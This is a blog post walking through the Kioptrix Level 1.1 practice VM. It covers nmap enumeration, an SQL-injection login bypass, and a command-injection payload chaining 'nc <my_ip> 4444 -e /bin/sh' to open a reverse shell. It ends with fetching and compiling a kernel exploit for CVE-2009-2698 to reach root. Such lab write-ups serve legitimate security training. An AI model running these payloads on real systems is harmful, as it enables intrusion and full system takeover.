<!DOCTYPE html>
<html lang="en">

<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="description" content="">
  <meta name="generator" content="Hugo 0.21-DEV" />

  <title>Kioptrix Level 1.1 (Level 2) &middot; Leonardo Ferreira</title>

  
  
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pure/0.6.0/pure-min.css">

  <!--[if lte IE 8]>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pure/0.6.0/grids-responsive-old-ie-min.css">
  <![endif]-->
  <!--[if gt IE 8]><!-->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pure/0.6.0/grids-responsive-min.css">
  <!--<![endif]-->

  <!--[if lte IE 8]>
  <link rel="stylesheet" href="https://ferreirasc.github.io/css/side-menu-old-ie.css">
  <![endif]-->
  <!--[if gt IE 8]><!-->
  <link rel="stylesheet" href="https://ferreirasc.github.io/css/side-menu.css">
  <!--<![endif]-->

  <link rel="stylesheet" href="https://ferreirasc.github.io/css/blackburn.css">

  
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">

  
  <link href="https://fonts.googleapis.com/css?family=Raleway" rel="stylesheet" type="text/css">

  
 

  
  <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.1.0/styles/androidstudio.min.css">
  <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.1.0/highlight.min.js"></script>
  <script>hljs.initHighlightingOnLoad();</script>
  

  <link rel="shortcut icon" href="https://ferreirasc.github.io/img/favicon.ico" type="image/x-icon" />

</head>


<body>
<div id="layout">

  
<a href="#menu" id="menuLink" class="menu-link">
  
  <span></span>
</a>
<div id="menu">

  
  <a class="pure-menu-heading brand" href="https://ferreirasc.github.io/">Léo Ferreira</a>
  <ul>  
	<div id="avatar">
  </ul>


  <div class="pure-menu">
    <ul class="pure-menu-list">
      
      
        <li class="pure-menu-item">
          <a class="pure-menu-link" href="https://ferreirasc.github.io/"><i class='fa fa-home fa-fw'></i>Home</a>
      
        </li>
      
      
        <li class="pure-menu-item">
          <a class="pure-menu-link" href="https://ferreirasc.github.io/post/"><i class='fa fa-list fa-fw'></i>Posts</a>
      
        </li>
      
      
        <li class="pure-menu-item">
          <a class="pure-menu-link" href="https://ferreirasc.github.io/topics/"><i class='fa fa-folder fa-fw'></i>Topics</a>
      
        </li>
      
      
        <li class="pure-menu-item">
          <a class="pure-menu-link" href="https://ferreirasc.github.io/tags/"><i class='fa fa-tags fa-fw'></i>Tags</a>
      
        </li>
      
      
        <li class="pure-menu-item">
          <a class="pure-menu-link" href="https://ferreirasc.github.io/about/"><i class='fa fa-user fa-fw'></i>About</a>
      
        </li>
      
      
        <li class="pure-menu-item">
          <a class="pure-menu-link" href="https://ferreirasc.github.io/contact/"><i class='fa fa-phone fa-fw'></i>Contact</a>
      
        </li>
      
    </ul>
  </div>

  <div class="pure-menu social">
  <ul class="pure-menu-list">

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    

    
    <li class="pure-menu-item">
      <a class="pure-menu-link" href="https://linkedin.com/in/leonardo-meneses" target="_blank"><i class="fa fa-linkedin-square fa-fw"></i>LinkedIn</a>
    </li>
    

    

    

    

    

    

    
    <li class="pure-menu-item">
      <a class="pure-menu-link" href="https://github.com/ferreirasc" target="_blank"><i class="fa fa-github-square fa-fw"></i>GitHub</a>
    </li>
    

    

    

    

    

    

    

    

  </ul>
</div>


  <div>
  <div class="small-print">
    <small>&copy; 2016. All rights reserved.</small>
  </div>
  <div class="small-print">
    <small>Built with&nbsp;<a href="https://gohugo.io/" target="_blank">Hugo</a></small>
    <small>Theme&nbsp;<a href="https://github.com/yoshiharuyamashita/blackburn" target="_blank">Blackburn</a></small>
  </div>
</div>

</div>


  <div id="main">


<div class="header">
  <h1>Kioptrix Level 1.1 (Level 2)</h1>
  <h2></h2>
</div>
<div class="content">

  <div class="post-meta">

  <div>
    <i class="fa fa-calendar fa-fw"></i>
    <time>28 Jul 2017, 15:51</time>
  </div>

  

  
  
  
  <div>
    <i class="fa fa-folder fa-fw"></i>
    
      <a class="post-taxonomy-topic" href="https://ferreirasc.github.io/topics/boot2root">boot2root</a>
    
  </div>
  
  

  
  
  
  <div>
    <i class="fa fa-tags fa-fw"></i>
    
      <a class="post-taxonomy-tag" href="https://ferreirasc.github.io/tags/boot2root">boot2root</a>&nbsp;&#47;
    
      <a class="post-taxonomy-tag" href="https://ferreirasc.github.io/tags/kioptrix">kioptrix</a>&nbsp;&#47;
    
      <a class="post-taxonomy-tag" href="https://ferreirasc.github.io/tags/hacking">hacking</a>&nbsp;&#47;
    
      <a class="post-taxonomy-tag" href="https://ferreirasc.github.io/tags/oscp">oscp</a>
    
  </div>
  
  

</div>

  <p>Let&rsquo;s get started scanning my network to discovering the Kioptrix 1.1 VM:</p>

<pre><code>root@kali:~# nmap -sn 192.168.3.0/24

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-27 17:57 EDT
&lt;-- omitted information --&gt;
Nmap scan report for 192.168.3.98
Host is up (0.0035s latency).
MAC Address: 00:0C:29:57:92:6D (VMware)
&lt;-- omitted information --&gt;
Nmap done: 256 IP addresses (11 hosts up) scanned in 8.61 seconds
</code></pre>

<p>The 192.168.3.98 address is mapped to Kioptrix 1.1 on my network. We can do a basic enumeration with nmap to verify the services running on this machine:</p>

<pre><code>root@kali:~# nmap -sS -Pn -sV --script=default 192.168.3.98

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-27 18:20 EDT
Nmap scan report for 192.168.3.98
Host is up (0.0050s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            643/udp  status
|_  100024  1            646/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2017-07-29T12:20:24+00:00; +1d13h59m41s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods:
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
646/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:57:92:6D (VMware)

Host script results:
|_clock-skew: mean: 1d13h59m40s, deviation: 0s, median: 1d13h59m40s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.47 seconds
</code></pre>

<p>Let&rsquo;s take a look on the web server running on the port 80:</p>

<p>IMAGEM</p>

<p>Trying a simple SQL injection trick to bypass the authentication&hellip;</p>

<p>IMAGEM</p>

<p>I&rsquo;m in. :-)</p>

<p>IMAGEM</p>

<p>Apparently, the only function of this &ldquo;Administration page&rdquo; is to ping a address on my network. If the application can ping a machine from this field, it could also execute other commands. Assuming that the input could be an argument for a system() function, for example, if I&rsquo;m lucky I could take advantage of this for execute a payload invoking a reverse shell just using a simple &ldquo;;&rdquo; to separate two commands in a shell:</p>

<pre><code>ping 192.168.3.1;nc &lt;my_ip&gt; 4444 -e /bin/sh
</code></pre>

<p>I setup a listening on port 4444 to handle it but did not work.</p>

<p>Maybe I need to provide a complete path to netcat binary (nc binary could not be present on the machine or maybe its directory would not be listed in $PATH). Let&rsquo;s use <em>whereis</em> command to discovering your path:</p>

<p>IMAGEM</p>

<p>And now we can find your right path:</p>

<p>IMAGEM</p>

<p>I checked the &ldquo;-e&rdquo; option on netcat binary and it was present (just a <em>&ldquo;ping 192.168.3.1;/usr/local/bin/nc &ndash;help&rdquo;</em>)&hellip; which saves me a lot of work! hahah</p>

<p>My reverse shell can be invoked right now:</p>

<p>IMAGEM</p>

<p>And here we go&hellip;</p>

<pre><code class="language-bash">root@kali:~# nc -lvp 4444
listening on [any] 4444 ...
192.168.3.98: inverse host lookup failed: Unknown host
connect to [192.168.3.92] from (UNKNOWN) [192.168.3.98] 32770
id
uid=48(apache) gid=48(apache) groups=48(apache)
bash -i
bash: no job control in this shell
bash-3.00$
</code></pre>

<p>I&rsquo;m in with the apache user context. From here, I often use this link as a reference for escalation privilege in *nix environments. Checking the <em>uname -a</em> command I figure out that the system is running with a vulnerable kernel version (2.6.9-55.EL), what led me to the link: EXPLOIT-DB.</p>

<p>I downloaded the code on my local machine and started a simple web server so my VM can get the code:</p>

<pre><code class="language-bash">ferreirasc@roarrr:/tmp$wget https://www.exploit-db.com/download/9542 -O CVE-2009-2698.c
--2017-07-29 14:00:02--  https://www.exploit-db.com/download/9542
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2645 (2.6K) [application/txt]
Saving to: ‘CVE-2009-2698.c’

CVE-2009-2698.c                             100%[===========================================================================================&gt;]   2.58K  --.-KB/s    in 0s

2017-07-29 14:00:03 (61.5 MB/s) - ‘CVE-2009-2698.c’ saved [2645/2645]

ferreirasc@roarrr:/tmp$ls
9542                          com.apple.launchd.8JhFxdQVtO/ com.apple.launchd.au2p9lNFwf/ mysql.sock=
CVE-2009-2698.c               com.apple.launchd.IQnTugcATa/ com.apple.launchd.qWURxTfKJP/ mysql.sock.lock
ferreirasc@roarrr:/tmp$python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
</code></pre>

<p>Then, let&rsquo;s compile and test this exploit on the machine:</p>

<pre><code class="language-bash">bash-3.00$ cd /tmp
bash-3.00$ pwd
/tmp
bash-3.00$ wget 192.168.3.95:8080/CVE-2009-2698.c
--09:51:29--  http://192.168.3.95:8080/CVE-2009-2698.c
           =&gt; `CVE-2009-2698.c'
Connecting to 192.168.3.95:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [text/plain]

    0K ..                                                    100%    5.18 MB/s

09:51:29 (5.18 MB/s) - `CVE-2009-2698.c' saved [2645/2645]

bash-3.00$ ls -lah
total 24K
drwxr-xrwx   4 root   root   4.0K Jul 29 09:51 .
drwxr-xr-x  23 root   root   4.0K Jul 29 05:39 ..
-rw-r--r--   1 apache apache 2.6K Jul 29  2017 CVE-2009-2698.c
drwxrwxrwt   2 root   root   4.0K Jul 29 05:40 .font-unix
drwxrwxrwt   2 root   root   4.0K Jul 29 05:39 .ICE-unix
bash-3.00$ gcc --version
gcc (GCC) 3.4.6 20060404 (Red Hat 3.4.6-8)
Copyright (C) 2006 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

bash-3.00$ gcc CVE-2009-2698.c -o CVE-2009-2698
bash-3.00$ ./CVE-2009-2698
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00#
</code></pre>

<p>Congrats, you have <strong>root</strong>! :D</p>


  
<div class="prev-next-post pure-g">
  <div class="pure-u-1-24" style="text-align: left;">
    
    <a href="https://ferreirasc.github.io/post/kioptrix_level_1/"><i class="fa fa-chevron-left"></i></a>
    
  </div>
  <div class="pure-u-10-24">
    
    <nav class="prev">
      <a href="https://ferreirasc.github.io/post/kioptrix_level_1/">Kioptrix Level 1</a>
    </nav>
    
  </div>
  <div class="pure-u-2-24">
    &nbsp;
  </div>
  <div class="pure-u-10-24">
    
  </div>
  <div class="pure-u-1-24" style="text-align: right;">
    
  </div>
</div>



  
<div id="disqus_thread"></div>
<script type="text/javascript">

(function() {
    
    
    if (window.location.hostname == "localhost")
        return;

    var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
    var disqus_shortname = 'Your Disqus shortname';
    dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
    (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>
<noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="http://disqus.com/" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>


</div>

</div>
</div>
<script src="https://ferreirasc.github.io/js/ui.js"></script>


<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'Your Google Analytics tracking ID', 'auto');
  ga('send', 'pageview');

</script>



</body>
</html>

